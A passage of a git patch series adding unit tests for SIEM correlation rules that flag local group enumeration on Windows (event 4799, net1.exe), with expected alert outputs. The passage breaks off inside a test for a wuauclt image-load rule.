"subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "0x10b4", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_3.sc new file mode 100644 index 00000000..d351f53e --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_3.sc @@ -0,0 +1,4 @@ +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-05T09:25:03.8679616Z\"},\"EventRecordID\":\"10091\",\"Correlation\":{\"ActivityID\":\"{fdc063de-4b69-0000-5564-c0fd694bd501}\"},\"Execution\":{\"ProcessID\":\"620\",\"ThreadID\":\"1948\"},\"Channel\":\"Security\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrators\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-544\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2e47a\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x5c0\"},{\"Name\":\"CallerProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\net1.exe\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "189562", "datafield2": "1472", "datafield3": "C:\\Windows\\System32\\net1.exe", "datafield4": "net1.exe", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-544", "object.name": "Administrators", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T17:39:15.791Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.domain": "msedgewin10", "subject.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.name": "ieuser", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "1472", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-05T09:25:03.867Z", "type": "raw", "uuid": "53a0edb8-62ec-4480-9d52-6f6dab99c942"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.context": "Administrators|", "alert.key": "net1.exe|ieuser", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Enumeration_Users_In_Groups", "correlation_type": "incident", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Enumeration_Users_In_Groups|msedgewin10|s-1-5-21-3461203602-4096304019-2269080069-1000", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.name": "Administrators", "object.type": "local security-enabled", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "1472", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\"} From f7d7c5255fe296af57bf34de47ffdce1114b2bbb Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 14:06:17 +0300 Subject: [PATCH 31/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Local=5F?= =?UTF-8?q?Groups=5FEnumeration=5FDiscovery)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Local_Groups_Enumeration_Discovery/tests/test_1.sc | 4 ++++ .../Local_Groups_Enumeration_Discovery/tests/test_2.sc | 9 +++++++++ 2 files changed, 13 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_1.sc new file mode 100644 index 00000000..32a595bb --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:52:02.1550291Z\"},\"EventRecordID\":\"3819707\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"10848\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrators\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-544\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x23ec715\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x23e8\"},{\"Name\":\"CallerProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\net1.exe\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "37668629", "datafield2": "9192", "datafield3": "C:\\Windows\\System32\\net1.exe", "datafield4": "net1.exe", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-544", "object.name": "Administrators", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T20:50:51.126Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "37668629", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "9192", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:52:02.155Z", "type": "raw", "uuid": "f5e7e0ce-4a0d-455c-a500-699b039bcdbd"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "read", "alert.context": "3b\\jbrown enumed local group Administrators on 01566s-win16-ir.threebeesco.com", "alert.key": "Administrators", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Local_Groups_Enumeration_Discovery", "correlation_type": "event", "event_src.category": "Operating system", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "low", "object": "user_group", "object.name": "Administrators", "object.type": "local security-enabled", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "37668629", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "9192", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_2.sc new file mode 100644 index 00000000..3e79dc59 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_2.sc @@ -0,0 +1,9 @@ +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:52:02.1550291Z\"},\"EventRecordID\":\"3819707\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"10848\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrators\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-544\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x23ec715\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x23e8\"},{\"Name\":\"CallerProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\net1.exe\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "37668629", "datafield2": "9192", "datafield3": "C:\\Windows\\System32\\net1.exe", "datafield4": "net1.exe", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-544", "object.name": "Administrators", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T21:23:30.339Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "37668629", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "9192", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:52:02.155Z", "type": "raw", "uuid": "ebbd935b-17e0-437a-b7d9-5e9a5cc2574f"} +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:53:14.3990509Z\"},\"EventRecordID\":\"3819735\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"2604\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrators\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-544\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2be6273\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x0\"},{\"Name\":\"CallerProcessName\",\"text\":\"-\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "46031475", "datafield2": "0", "datafield3": "-", "datafield4": "-", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-544", "object.name": "Administrators", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T21:23:30.339Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "46031475", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "-", "subject.process.id": "0", "subject.process.name": "-", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:53:14.399Z", "type": "raw", "uuid": "7845c35f-2cd9-4d34-8d17-3716eda09c4e"} +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:54:02.4164913Z\"},\"EventRecordID\":\"3819752\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"2604\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrators\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-544\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2bf470d\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x0\"},{\"Name\":\"CallerProcessName\",\"text\":\"-\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "46089997", "datafield2": "0", "datafield3": "-", "datafield4": "-", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-544", "object.name": "Administrators", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T21:23:30.339Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "46089997", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "-", "subject.process.id": "0", "subject.process.name": "-", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:54:02.416Z", "type": "raw", "uuid": "9dc13012-355d-48a2-bbf4-0f48346b9fe5"} +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:54:18.0016387Z\"},\"EventRecordID\":\"3819771\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"2604\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Remote Desktop Users\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-555\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2bfa357\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x0\"},{\"Name\":\"CallerProcessName\",\"text\":\"-\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "46113623", "datafield2": "0", "datafield3": "-", "datafield4": "-", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-555", "object.name": "Remote Desktop Users", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T21:23:30.339Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "46113623", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "-", "subject.process.id": "0", "subject.process.name": "-", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:54:18.001Z", "type": "raw", "uuid": "708ada5b-c2df-409a-8736-a5e015251801"} +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:54:42.8999934Z\"},\"EventRecordID\":\"3819788\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"10940\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Users\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-545\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2c00357\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x0\"},{\"Name\":\"CallerProcessName\",\"text\":\"-\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "46138199", "datafield2": "0", "datafield3": "-", "datafield4": "-", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-545", "object.name": "Users", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T21:23:30.339Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "46138199", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "-", "subject.process.id": "0", "subject.process.name": "-", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:54:42.899Z", "type": "raw", "uuid": "dd71f5fe-1c97-429e-975d-ed21c6198fb1"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 5 {"action": "read", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Local_Groups_Enumeration_Discovery", "correlation_type": "event", "event_src.category": "Operating system", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "low", "object": "user_group", "object.type": "local security-enabled", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown"} + \ No newline at end of file From 7e76d8db63015ad50e37069f8687aa91d800b5d8 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 10:20:28 +0300 Subject: [PATCH 32/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Detect=5Fexecution=5Fimageload=5Fwuauclt=5Flolbas)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Detect_execution_imageload_wuauclt_lolbas/tests/test_1.sc | 4 ++-- .../Detect_execution_imageload_wuauclt_lolbas/tests/test_2.sc | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_1.sc index dab733fa..37b027ba 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_1.sc @@ -1,4 +1,4 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-10-13T20:11:42.2692242Z\"},\"EventRecordID\":\"2196441\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"5340\",\"ThreadID\":\"7092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"LAPTOP-JU4M3I0E\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-10-13 